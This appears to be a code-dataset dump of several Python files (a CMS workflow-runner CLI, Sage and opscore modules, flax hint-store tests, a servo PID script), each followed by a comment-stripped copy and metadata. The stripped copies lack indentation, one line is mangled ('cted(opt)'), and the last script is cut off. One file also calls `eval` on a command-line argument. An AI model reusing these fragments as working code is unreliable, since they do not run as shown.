    parser.add_option('--workflow',
                      help='define a workflow to be created or altered from the matrix',
                      action='append',
                      dest='workflow',
                      default=None
                     )
    parser.add_option('--dryRun',
                      help='do not run the wf at all',
                      action='store_true',
                      dest='dryRun',
                      default=False
                     )
    parser.add_option('--testbed',
                      help='workflow injection to cmswebtest (you need dedicated rqmgr account)',
                      dest='testbed',
                      default=False,
                      action='store_true'
                     )
    parser.add_option('--noCafVeto',
                      help='Run from any source, ignoring the CAF label',
                      dest='cafVeto',
                      default=True,
                      action='store_false'
                     )
    parser.add_option('--overWrite',
                      help='Change the content of a step for another. List of pairs.',
                      dest='overWrite',
                      default=None
                     )
    parser.add_option('--noRun',
                      help='Remove all run list selection from wfs',
                      dest='noRun',
                      default=False,
                      action='store_true')
    parser.add_option('--das-options',
                      help='Options to be passed to dasgoclient.',
                      dest='dasOptions',
                      default="--limit 0",
                      action='store')
    parser.add_option('--job-reports',
                      help='Dump framework job reports',
                      dest='jobReports',
                      default=False,
                      action='store_true')
    parser.add_option('--ibeos',
                      help='Use IB EOS site configuration',
                      dest='IBEos',
                      default=False,
                      action='store_true')

    opt,args = parser.parse_args()
    if opt.IBEos:
        import os
        # fix: `commands` is Python-2-only (removed in py3); fall back to the
        # py3 equivalent so the script runs under both interpreters.
        try:
            from commands import getstatusoutput as run_cmd
        except ImportError:
            from subprocess import getstatusoutput as run_cmd

        ibeos_cache = os.path.join(os.getenv("LOCALRT"), "ibeos_cache.txt")
        if not os.path.exists(ibeos_cache):
            err, out = run_cmd("curl -L -s -o %s https://raw.githubusercontent.com/cms-sw/cms-sw.github.io/master/das_queries/ibeos.txt" % ibeos_cache)
            if err:
                run_cmd("rm -f %s" % ibeos_cache)
                print("Error: Unable to download ibeos cache information")
                print(out)
                sys.exit(err)

        for cmssw_env in [ "CMSSW_BASE", "CMSSW_RELEASE_BASE" ]:
            cmssw_base = os.getenv(cmssw_env,None)
            if not cmssw_base: continue
            cmssw_base = os.path.join(cmssw_base,"src/Utilities/General/ibeos")
            if os.path.exists(cmssw_base):
                os.environ["PATH"]=cmssw_base+":"+os.getenv("PATH")
                os.environ["CMS_PATH"]="/cvmfs/cms-ib.cern.ch"
                os.environ["CMSSW_USE_IBEOS"]="true"
                print(">> WARNING: You are using SITECONF from /cvmfs/cms-ib.cern.ch")
                break
    if opt.restricted:
        print('Deprecated, please use -l limited')
        if opt.testList: opt.testList+=',limited'
        else: opt.testList='limited'

    def stepOrIndex(s):
        # steps may be referenced by name (string) or by position (int)
        if s.isdigit():
            return int(s)
        else:
            return s
    if opt.apply:
        # fix: wrap in list() — under py3, map() returns a one-shot iterator
        opt.apply=list(map(stepOrIndex,opt.apply.split(',')))
    if opt.keep:
        opt.keep=list(map(stepOrIndex,opt.keep.split(',')))

    if opt.testList:
        testList=[]
        for entry in opt.testList.split(','):
            if not entry: continue
            mapped=False
            # named sets match by prefix or suffix (e.g. 'muon' -> 'muonmc')
            for k in predefinedSet:
                if k.lower().startswith(entry.lower()) or k.lower().endswith(entry.lower()):
                    testList.extend(predefinedSet[k])
                    mapped=True
                    break
            if not mapped:
                try:
                    testList.append(float(entry))
                except ValueError:
                    # fix: was a bare except; only a non-numeric entry is expected here
                    print(entry,'is not a possible selected entry')

        opt.testList = list(set(testList))

    if opt.useInput: opt.useInput = opt.useInput.split(',')
    if opt.fromScratch: opt.fromScratch = opt.fromScratch.split(',')
    if opt.nProcs: opt.nProcs=int(opt.nProcs)
    if opt.nThreads: opt.nThreads=int(opt.nThreads)
    if (opt.memoryOffset): opt.memoryOffset=int(opt.memoryOffset)
    if (opt.memPerCore): opt.memPerCore=int(opt.memPerCore)

    if opt.wmcontrol:
        performInjectionOptionTest(opt)
    if opt.overWrite:
        # NOTE(review): eval() of a CLI argument — fine for a developer tool,
        # but do not expose this to untrusted input.
        opt.overWrite=eval(opt.overWrite)

    if opt.raw and opt.show: ###prodAgent to be discontinued
        ret = showRaw(opt)
    else:
        ret = runSelected(opt)

    sys.exit(ret)
| 41.390313
| 216
| 0.489744
|
from __future__ import print_function
import sys
from Configuration.PyReleaseValidation.MatrixReader import MatrixReader
from Configuration.PyReleaseValidation.MatrixRunner import MatrixRunner
from Configuration.PyReleaseValidation.MatrixInjector import MatrixInjector,performInjectionOptionTest
def showRaw(opt):
mrd = MatrixReader(opt)
mrd.showRaw(opt.useInput, opt.refRel, opt.fromScratch, opt.raw, opt.step1Only, selected=opt.testList)
return 0
def runSelected(opt):
    """Prepare the workflow matrix, then show or run the selected workflows.

    Validates that every workflow id in opt.testList exists, runs (or just
    lists, when opt.show is set) the selection, and optionally injects the
    workflows into WMAgent when opt.wmcontrol is given.

    Returns the aggregate exit status (0 on success).
    """
    mrd = MatrixReader(opt)
    mrd.prepare(opt.useInput, opt.refRel, opt.fromScratch)
    # Reject any requested workflow number that is not defined in the matrix.
    if opt.testList:
        definedWF = []
        for dwf in mrd.workFlows: definedWF.append(dwf.numId)
        for twf in opt.testList:
            if twf not in definedWF: raise ValueError('Not defined workflow ', twf , ' requested')
    ret = 0
    if opt.show:
        # Display-only mode: list the workflows, never execute them.
        mrd.show(opt.testList, opt.extended, opt.cafVeto)
        if opt.testList : print('testListected items:', opt.testList)
    else:
        # Execute the selection with the requested process/thread parallelism.
        mRunnerHi = MatrixRunner(mrd.workFlows, opt.nProcs, opt.nThreads)
        ret = mRunnerHi.runTests(opt)
    if opt.wmcontrol:
        # WMAgent injection only proceeds when every local run succeeded.
        if ret!=0:
            print('Cannot go on with wmagent injection with failing workflows')
        else:
            wfInjector = MatrixInjector(opt,mode=opt.wmcontrol,options=opt.wmoptions)
            ret= wfInjector.prepare(mrd,
                                    mRunnerHi.runDirs)
            if ret==0:
                wfInjector.upload()
                wfInjector.submit()
    return ret
if __name__ == '__main__':
predefinedSet={
'limited' : [5.1,
7.3,
8,
25,
4.22,
4.53,
9.0,
1000,
1001,
101.0,
136.731,
136.7611,
136.8311,
136.788,
136.85,
140.53,
140.56,
158.0,
1306.0,
1325.7,
1330,
135.4,
10042.0,
10024.0,
10224.0,
10824.0,
11634.0,
12434.0,
20034.0,
20434.0,
21234.0,
22034.0,
25202.0,
250202.181,
],
'jetmc': [5.1, 13, 15, 25, 38, 39],
'metmc' : [5.1, 15, 25, 37, 38, 39],
'muonmc' : [5.1, 124.4, 124.5, 20, 21, 22, 23, 25, 30],
}
import optparse
usage = 'usage: runTheMatrix.py --show -s '
parser = optparse.OptionParser(usage)
parser.add_option('-b','--batchName',
help='relval batch: suffix to be appended to Campaign name',
dest='batchName',
default=''
)
parser.add_option('-m','--memoryOffset',
help='memory of the wf for single core',
dest='memoryOffset',
default=3000
)
parser.add_option('--addMemPerCore',
help='increase of memory per each n > 1 core: memory(n_core) = memoryOffset + (n_core-1) * memPerCore',
dest='memPerCore',
default=1500
)
parser.add_option('-j','--nproc',
help='number of processes. 0 Will use 4 processes, not execute anything but create the wfs',
dest='nProcs',
default=4
)
parser.add_option('-t','--nThreads',
help='number of threads per process to use in cmsRun.',
dest='nThreads',
default=1
)
parser.add_option('-n','--showMatrix',
help='Only show the worflows. Use --ext to show more',
dest='show',
default=False,
action='store_true'
)
parser.add_option('-e','--extended',
help='Show details of workflows, used with --show',
dest='extended',
default=False,
action='store_true'
)
parser.add_option('-s','--selected',
help='Run a pre-defined selected matrix of wf. Deprecated, please use -l limited',
dest='restricted',
default=False,
action='store_true'
)
parser.add_option('-l','--list',
help='Coma separated list of workflow to be shown or ran. Possible keys are also '+str(predefinedSet.keys())+'. and wild card like muon, or mc',
dest='testList',
default=None
)
parser.add_option('-r','--raw',
help='Temporary dump the .txt needed for prodAgent interface. To be discontinued soon. Argument must be the name of the set (standard, pileup,...)',
dest='raw'
)
parser.add_option('-i','--useInput',
help='Use recyling where available. Either all, or a coma separated list of wf number.',
dest='useInput',
default=None
)
parser.add_option('-w','--what',
help='Specify the set to be used. Argument must be the name of the set (standard, pileup,...)',
dest='what',
default='all'
)
parser.add_option('--step1',
help='Used with --raw. Limit the production to step1',
dest='step1Only',
default=False
)
parser.add_option('--maxSteps',
help='Only run maximum on maxSteps. Used when we are only interested in first n steps.',
dest='maxSteps',
default=9999,
type="int"
)
parser.add_option('--fromScratch',
help='Coma separated list of wf to be run without recycling. all is not supported as default.',
dest='fromScratch',
default=None
)
parser.add_option('--refRelease',
help='Allow to modify the recycling dataset version',
dest='refRel',
default=None
)
parser.add_option('--wmcontrol',
help='Create the workflows for injection to WMAgent. In the WORKING. -wmcontrol init will create the the workflows, -wmcontrol test will dryRun a test, -wmcontrol submit will submit to wmagent',
choices=['init','test','submit','force'],
dest='wmcontrol',
default=None,
)
parser.add_option('--revertDqmio',
help='When submitting workflows to wmcontrol, force DQM outout to use pool and not DQMIO',
choices=['yes','no'],
dest='revertDqmio',
default='no',
)
parser.add_option('--optionswm',
help='Specify a few things for wm injection',
default='',
dest='wmoptions')
parser.add_option('--keep',
help='allow to specify for which coma separated steps the output is needed',
default=None)
parser.add_option('--label',
help='allow to give a special label to the output dataset name',
default='')
parser.add_option('--command',
help='provide a way to add additional command to all of the cmsDriver commands in the matrix',
dest='command',
default=None
)
parser.add_option('--apply',
help='allow to use the --command only for 1 coma separeated',
dest='apply',
default=None)
parser.add_option('--workflow',
help='define a workflow to be created or altered from the matrix',
action='append',
dest='workflow',
default=None
)
parser.add_option('--dryRun',
help='do not run the wf at all',
action='store_true',
dest='dryRun',
default=False
)
parser.add_option('--testbed',
help='workflow injection to cmswebtest (you need dedicated rqmgr account)',
dest='testbed',
default=False,
action='store_true'
)
parser.add_option('--noCafVeto',
help='Run from any source, ignoring the CAF label',
dest='cafVeto',
default=True,
action='store_false'
)
parser.add_option('--overWrite',
help='Change the content of a step for another. List of pairs.',
dest='overWrite',
default=None
)
parser.add_option('--noRun',
help='Remove all run list selection from wfs',
dest='noRun',
default=False,
action='store_true')
parser.add_option('--das-options',
help='Options to be passed to dasgoclient.',
dest='dasOptions',
default="--limit 0",
action='store')
parser.add_option('--job-reports',
help='Dump framework job reports',
dest='jobReports',
default=False,
action='store_true')
parser.add_option('--ibeos',
help='Use IB EOS site configuration',
dest='IBEos',
default=False,
action='store_true')
opt,args = parser.parse_args()
if opt.IBEos:
import os
from commands import getstatusoutput as run_cmd
ibeos_cache = os.path.join(os.getenv("LOCALRT"), "ibeos_cache.txt")
if not os.path.exists(ibeos_cache):
err, out = run_cmd("curl -L -s -o %s https://raw.githubusercontent.com/cms-sw/cms-sw.github.io/master/das_queries/ibeos.txt" % ibeos_cache)
if err:
run_cmd("rm -f %s" % ibeos_cache)
print("Error: Unable to download ibeos cache information")
print(out)
sys.exit(err)
for cmssw_env in [ "CMSSW_BASE", "CMSSW_RELEASE_BASE" ]:
cmssw_base = os.getenv(cmssw_env,None)
if not cmssw_base: continue
cmssw_base = os.path.join(cmssw_base,"src/Utilities/General/ibeos")
if os.path.exists(cmssw_base):
os.environ["PATH"]=cmssw_base+":"+os.getenv("PATH")
os.environ["CMS_PATH"]="/cvmfs/cms-ib.cern.ch"
os.environ["CMSSW_USE_IBEOS"]="true"
print(">> WARNING: You are using SITECONF from /cvmfs/cms-ib.cern.ch")
break
if opt.restricted:
print('Deprecated, please use -l limited')
if opt.testList: opt.testList+=',limited'
else: opt.testList='limited'
def stepOrIndex(s):
if s.isdigit():
return int(s)
else:
return s
if opt.apply:
opt.apply=map(stepOrIndex,opt.apply.split(','))
if opt.keep:
opt.keep=map(stepOrIndex,opt.keep.split(','))
if opt.testList:
testList=[]
for entry in opt.testList.split(','):
if not entry: continue
mapped=False
for k in predefinedSet:
if k.lower().startswith(entry.lower()) or k.lower().endswith(entry.lower()):
testList.extend(predefinedSet[k])
mapped=True
break
if not mapped:
try:
testList.append(float(entry))
except:
print(entry,'is not a possible selected entry')
opt.testList = list(set(testList))
if opt.useInput: opt.useInput = opt.useInput.split(',')
if opt.fromScratch: opt.fromScratch = opt.fromScratch.split(',')
if opt.nProcs: opt.nProcs=int(opt.nProcs)
if opt.nThreads: opt.nThreads=int(opt.nThreads)
if (opt.memoryOffset): opt.memoryOffset=int(opt.memoryOffset)
if (opt.memPerCore): opt.memPerCore=int(opt.memPerCore)
if opt.wmcontrol:
performInjectionOptionTest(opt)
if opt.overWrite:
opt.overWrite=eval(opt.overWrite)
if opt.raw and opt.show: cted(opt)
sys.exit(ret)
| true
| true
|
790c50c393f7e3d5309afc7e342afd439d7cb2e5
| 1,043
|
py
|
Python
|
src/sage/algebras/algebra_element.py
|
robertwb/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | 2
|
2018-06-30T01:37:35.000Z
|
2018-06-30T01:37:39.000Z
|
src/sage/algebras/algebra_element.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/algebra_element.py
|
boothby/sage
|
1b1e6f608d1ef8ee664bb19e991efbbc68cbd51f
|
[
"BSL-1.0"
] | null | null | null |
"""
Base class for algebra elements
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.superseded import deprecation
deprecation(21141, "the module sage.algebras.algebra_element is deprecated, import from sage.structure.element instead")
from sage.structure.element import AlgebraElement
def is_AlgebraElement(x):
    r"""
    Check whether ``x`` is an :class:`AlgebraElement`.

    Returns ``True`` exactly when ``x`` is an instance of
    ``AlgebraElement`` (including subclasses), ``False`` otherwise.
    """
    return isinstance(x, AlgebraElement)
| 31.606061
| 120
| 0.612656
|
from sage.misc.superseded import deprecation
deprecation(21141, "the module sage.algebras.algebra_element is deprecated, import from sage.structure.element instead")
from sage.structure.element import AlgebraElement
def is_AlgebraElement(x):
return isinstance(x, AlgebraElement)
| true
| true
|
790c51f87e0d519f54f3f2959899dd92256edd48
| 3,168
|
py
|
Python
|
python/opscore/RO/ParseMsg/ParseData.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
python/opscore/RO/ParseMsg/ParseData.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T21:08:14.000Z
|
2021-08-17T21:08:14.000Z
|
python/opscore/RO/ParseMsg/ParseData.py
|
sdss/opscore
|
dd4f2b2ad525fe3dfe3565463de2c079a7e1232e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
"""
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
    """Parse a hub keyword-value message into an ordered mapping.

    The input string has the form::

        keyword1=value11, value12,...; keyword2=value21,...; keyword3=; keyword4

    where each keyword starts with a letter or underscore (followed by
    letters, digits or underscores) and each value is an integer, a
    floating point number, or a single- or double-quoted string.  A
    keyword may carry zero values, in which case the '=' is optional.

    Returns an opscore.RO.Alg.OrderedDict mapping each keyword, in the
    order encountered, to a tuple of its values; a keyword with no
    values maps to the empty tuple.
    """
    parsed = opscore.RO.Alg.OrderedDict()
    if astr == '':
        return parsed

    # getKeyword/getValues each return the next scan position,
    # or None once the end of the message has been reached.
    pos = 0
    while pos is not None:
        keyword, pos = getKeyword(astr, pos)
        valueTuple, pos = getValues(astr, pos)
        parsed[keyword] = valueTuple
    return parsed
if __name__ == '__main__':
# perform test
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| 39.111111
| 92
| 0.636048
|
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
dataDict[keyword] = valueTuple
return dataDict
if __name__ == '__main__':
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| true
| true
|
790c53f7e56d39b1a643d9e18dc20fad39757347
| 507
|
py
|
Python
|
python/ray/dataframe/index.py
|
cathywu/ray
|
8e333977e0991738558f4c8bb737da5fb29df0c6
|
[
"Apache-2.0"
] | 2
|
2017-12-19T08:18:51.000Z
|
2018-01-19T02:42:28.000Z
|
python/ray/dataframe/index.py
|
cathywu/ray
|
8e333977e0991738558f4c8bb737da5fb29df0c6
|
[
"Apache-2.0"
] | 5
|
2018-01-04T22:54:34.000Z
|
2018-02-06T23:48:20.000Z
|
python/ray/dataframe/index.py
|
cathywu/ray
|
8e333977e0991738558f4c8bb737da5fb29df0c6
|
[
"Apache-2.0"
] | 3
|
2018-01-04T21:18:42.000Z
|
2019-01-20T05:34:33.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pandas as pd
class Index(object):
    """Thin wrapper holding a pandas index for a partitioned dataframe."""

    def __init__(self, idx):
        # The underlying pandas index object.
        self.idx = idx

    @staticmethod
    def to_pandas(indices):
        """Merge a list of pandas Index objects into a single pandas index.

        Bug fix: this was decorated ``@classmethod`` while taking only
        ``indices``, so ``Index.to_pandas(lst)`` bound the class itself to
        ``indices`` and raised TypeError.  ``@staticmethod`` keeps the same
        call form and makes it work.

        RangeIndex inputs are merged with ``union`` (sorted, de-duplicated);
        any other index type is simply concatenated via ``append``.
        """
        if isinstance(indices[0], pd.RangeIndex):
            merged = indices[0]
            for index in indices[1:]:
                merged = merged.union(index)
            return merged
        else:
            return indices[0].append(indices[1:])
| 23.045455
| 49
| 0.625247
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pandas as pd
class Index(object):
def __init__(self, idx):
self.idx = idx
@classmethod
def to_pandas(indices):
if isinstance(indices[0], pd.RangeIndex):
merged = indices[0]
for index in indices[1:]:
merged = merged.union(index)
return merged
else:
return indices[0].append(indices[1:])
| true
| true
|
790c54967d8d9b1d0670a59bf6bf62083c10aa50
| 3,073
|
py
|
Python
|
tests/core/full_node/test_hint_store.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 174
|
2021-06-16T17:49:22.000Z
|
2022-03-17T03:03:17.000Z
|
tests/core/full_node/test_hint_store.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 49
|
2021-06-17T14:10:53.000Z
|
2022-01-31T11:04:21.000Z
|
tests/core/full_node/test_hint_store.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 80
|
2021-06-17T14:23:31.000Z
|
2022-02-24T05:52:47.000Z
|
import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from flax.consensus.blockchain import Blockchain
from flax.full_node.hint_store import HintStore
from flax.types.blockchain_format.coin import Coin
from flax.types.condition_opcodes import ConditionOpcode
from flax.types.condition_with_args import ConditionWithArgs
from flax.types.spend_bundle import SpendBundle
from tests.util.db_connection import DBConnection
from tests.wallet_tools import WalletTool
from tests.setup_nodes import bt
@pytest.fixture(scope="module")
def event_loop():
    """Provide one asyncio event loop shared by all tests in this module."""
    loop = asyncio.get_event_loop()
    yield loop
log = logging.getLogger(__name__)
class TestHintStore:
    """Tests for HintStore: persisting coin-id/hint pairs and looking them up."""
    @pytest.mark.asyncio
    async def test_basic_store(self):
        """Add hint/coin pairs directly to a HintStore and query them back."""
        async with DBConnection() as db_wrapper:
            hint_store = await HintStore.create(db_wrapper)
            # Two stored hints shared by three coins, plus one hint that is
            # never stored (must look up to an empty list).
            hint_0 = 32 * b"\0"
            hint_1 = 32 * b"\1"
            not_existing_hint = 32 * b"\3"
            coin_id_0 = 32 * b"\4"
            coin_id_1 = 32 * b"\5"
            coin_id_2 = 32 * b"\6"
            hints = [(coin_id_0, hint_0), (coin_id_1, hint_0), (coin_id_2, hint_1)]
            await hint_store.add_hints(hints)
            await db_wrapper.commit_transaction()
            coins_for_hint_0 = await hint_store.get_coin_ids(hint_0)
            assert coin_id_0 in coins_for_hint_0
            assert coin_id_1 in coins_for_hint_0
            coins_for_hint_1 = await hint_store.get_coin_ids(hint_1)
            assert coin_id_2 in coins_for_hint_1
            coins_for_non_hint = await hint_store.get_coin_ids(not_existing_hint)
            assert coins_for_non_hint == []
    @pytest.mark.asyncio
    async def test_hints_in_blockchain(self, empty_blockchain): # noqa: F811
        """Spend a coin whose CREATE_COIN condition carries a hint and check
        that the blockchain's hint store resolves the hint to the new coin."""
        blockchain: Blockchain = empty_blockchain
        # Farm a few transaction blocks so there are reward coins to spend.
        blocks = bt.get_consecutive_blocks(
            5,
            block_list_input=[],
            guarantee_transaction_block=True,
            farmer_reward_puzzle_hash=bt.pool_ph,
            pool_reward_puzzle_hash=bt.pool_ph,
        )
        for block in blocks:
            await blockchain.receive_block(block)
        wt: WalletTool = bt.get_pool_wallet_tool()
        puzzle_hash = 32 * b"\0"
        amount = int_to_bytes(1)
        hint = 32 * b"\5"
        coin_spent = list(blocks[-1].get_included_reward_coins())[0]
        # CREATE_COIN with a third argument: [puzzle_hash, amount, hint].
        condition_dict = {
            ConditionOpcode.CREATE_COIN: [ConditionWithArgs(ConditionOpcode.CREATE_COIN, [puzzle_hash, amount, hint])]
        }
        tx: SpendBundle = wt.generate_signed_transaction(
            10,
            wt.get_new_puzzlehash(),
            coin_spent,
            condition_dic=condition_dict,
        )
        # Include the spend in new blocks so the hint gets recorded.
        blocks = bt.get_consecutive_blocks(
            10, block_list_input=blocks, guarantee_transaction_block=True, transaction_data=tx
        )
        for block in blocks:
            await blockchain.receive_block(block)
        get_hint = await blockchain.hint_store.get_coin_ids(hint)
        assert get_hint[0] == Coin(coin_spent.name(), puzzle_hash, 1).name()
| 33.402174
| 118
| 0.66645
|
import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from flax.consensus.blockchain import Blockchain
from flax.full_node.hint_store import HintStore
from flax.types.blockchain_format.coin import Coin
from flax.types.condition_opcodes import ConditionOpcode
from flax.types.condition_with_args import ConditionWithArgs
from flax.types.spend_bundle import SpendBundle
from tests.util.db_connection import DBConnection
from tests.wallet_tools import WalletTool
from tests.setup_nodes import bt
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
log = logging.getLogger(__name__)
class TestHintStore:
@pytest.mark.asyncio
async def test_basic_store(self):
async with DBConnection() as db_wrapper:
hint_store = await HintStore.create(db_wrapper)
hint_0 = 32 * b"\0"
hint_1 = 32 * b"\1"
not_existing_hint = 32 * b"\3"
coin_id_0 = 32 * b"\4"
coin_id_1 = 32 * b"\5"
coin_id_2 = 32 * b"\6"
hints = [(coin_id_0, hint_0), (coin_id_1, hint_0), (coin_id_2, hint_1)]
await hint_store.add_hints(hints)
await db_wrapper.commit_transaction()
coins_for_hint_0 = await hint_store.get_coin_ids(hint_0)
assert coin_id_0 in coins_for_hint_0
assert coin_id_1 in coins_for_hint_0
coins_for_hint_1 = await hint_store.get_coin_ids(hint_1)
assert coin_id_2 in coins_for_hint_1
coins_for_non_hint = await hint_store.get_coin_ids(not_existing_hint)
assert coins_for_non_hint == []
@pytest.mark.asyncio
async def test_hints_in_blockchain(self, empty_blockchain):
blockchain: Blockchain = empty_blockchain
blocks = bt.get_consecutive_blocks(
5,
block_list_input=[],
guarantee_transaction_block=True,
farmer_reward_puzzle_hash=bt.pool_ph,
pool_reward_puzzle_hash=bt.pool_ph,
)
for block in blocks:
await blockchain.receive_block(block)
wt: WalletTool = bt.get_pool_wallet_tool()
puzzle_hash = 32 * b"\0"
amount = int_to_bytes(1)
hint = 32 * b"\5"
coin_spent = list(blocks[-1].get_included_reward_coins())[0]
condition_dict = {
ConditionOpcode.CREATE_COIN: [ConditionWithArgs(ConditionOpcode.CREATE_COIN, [puzzle_hash, amount, hint])]
}
tx: SpendBundle = wt.generate_signed_transaction(
10,
wt.get_new_puzzlehash(),
coin_spent,
condition_dic=condition_dict,
)
blocks = bt.get_consecutive_blocks(
10, block_list_input=blocks, guarantee_transaction_block=True, transaction_data=tx
)
for block in blocks:
await blockchain.receive_block(block)
get_hint = await blockchain.hint_store.get_coin_ids(hint)
assert get_hint[0] == Coin(coin_spent.name(), puzzle_hash, 1).name()
| true
| true
|
790c565a9dbfdbb2e6752d4dc069ec6a95b66119
| 240
|
py
|
Python
|
07_RSI/ch03/sum.py
|
zzz0072/Python_Exercises
|
9918aa8197a77ef237e5e60306c7785eca5cb1d3
|
[
"BSD-2-Clause"
] | null | null | null |
07_RSI/ch03/sum.py
|
zzz0072/Python_Exercises
|
9918aa8197a77ef237e5e60306c7785eca5cb1d3
|
[
"BSD-2-Clause"
] | null | null | null |
07_RSI/ch03/sum.py
|
zzz0072/Python_Exercises
|
9918aa8197a77ef237e5e60306c7785eca5cb1d3
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
def sum_recursin(numList):
    """Recursively sum a sequence of numbers.

    Returns 0 for an empty sequence (the previous version raised
    IndexError on []); otherwise returns first element + sum of the rest.
    Note: recursion depth limits this to lists shorter than the
    interpreter's recursion limit (~1000 by default).
    """
    # Empty base case both fixes the [] crash and subsumes the old
    # single-element base case.
    if not numList:
        return 0
    return numList[0] + sum_recursin(numList[1:])
if __name__ == "__main__":
print(sum_recursin(list(range(1, 101))))
| 21.818182
| 53
| 0.629167
|
def sum_recursin(numList):
if len(numList) == 1:
return numList[0]
else:
return numList[0] + sum_recursin(numList[1:])
if __name__ == "__main__":
print(sum_recursin(list(range(1, 101))))
| true
| true
|
790c57916664bdf52a3d4db6c000e84b671e95b2
| 1,489
|
py
|
Python
|
run.py
|
alvarlagerlof/ball-pid
|
6122e729782750818449645f97db41b31503a9aa
|
[
"MIT"
] | null | null | null |
run.py
|
alvarlagerlof/ball-pid
|
6122e729782750818449645f97db41b31503a9aa
|
[
"MIT"
] | null | null | null |
run.py
|
alvarlagerlof/ball-pid
|
6122e729782750818449645f97db41b31503a9aa
|
[
"MIT"
] | null | null | null |
from math import ceil
from time import sleep
from config import *
from servo import *
from camera import *
from pid import *
# Init: two servos driving the platform, a camera tracking the ball, and
# the PID controller.  NOTE(review): `PID = PID()` rebinds the class name
# to the instance, so a second controller can no longer be constructed.
servo1 = Servo(2)
servo2 = Servo(3)
servo_count = 0
#servo1.setAngle(90)
#sleep(1)
#servo2.setAngle(90)
#sleep(1)
camera = Camera()
PID = PID()
# Main control loop: read ball position, compute correction, drive servos.
while True:
    # data is (x, y, frame); x/y are falsy when no ball is detected.
    data = camera.getBallPos()
    #data = None
    if not (data[0] and data[1]):
        print("No ball found")
    else:
        # Calculate PID correction from the ball position.
        move = PID.calculate(data[0], data[1])
        # Print result
        #print("x", round(move[0]), "y", round(move[1]), round(move[2]*600))
        # Map the correction onto servo angles centred at 90 degrees
        # (y axis inverted to match the platform orientation).
        #move_x = ( (move[0] - conf.cam_x_min) / (conf.cam_x_max - conf.cam_x_min) ) * (conf.servo_max - conf.servo_min) + conf.servo_min
        #move_y = ( (move[1] - conf.cam_y_min) / (conf.cam_y_max - conf.cam_y_min) ) * (conf.servo_max - conf.servo_min) + conf.servo_min
        move_x = ((move[0])/2)+90
        move_y = ((-move[1])/2)+90
        print(move_x, move_y)
        # Only command the servos every 4th frame to limit jitter.
        servo_count += 1
        if servo_count > 3:
            servo1.setAngle(move_x)
            servo2.setAngle(move_y)
            servo_count = 0
        #servo.moveTo(2, move[1])
    # Show the camera frame.  NOTE(review): data[2] is displayed even in
    # the "no ball" branch — assumes getBallPos always returns a valid
    # frame there; verify against Camera.getBallPos.
    cv2.imshow("Frame", data[2])
    key = cv2.waitKey(1) & 0xFF
    # Stop (release servos and camera) when 'q' is pressed.
    if key == ord("q"):
        servo1.stop()
        servo2.stop()
        camera.stop()
| 17.72619
| 137
| 0.534587
|
from math import ceil
from time import sleep
from config import *
from servo import *
from camera import *
from pid import *
servo1 = Servo(2)
servo2 = Servo(3)
servo_count = 0
camera = Camera()
PID = PID()
while True:
data = camera.getBallPos()
if not (data[0] and data[1]):
print("No ball found")
else:
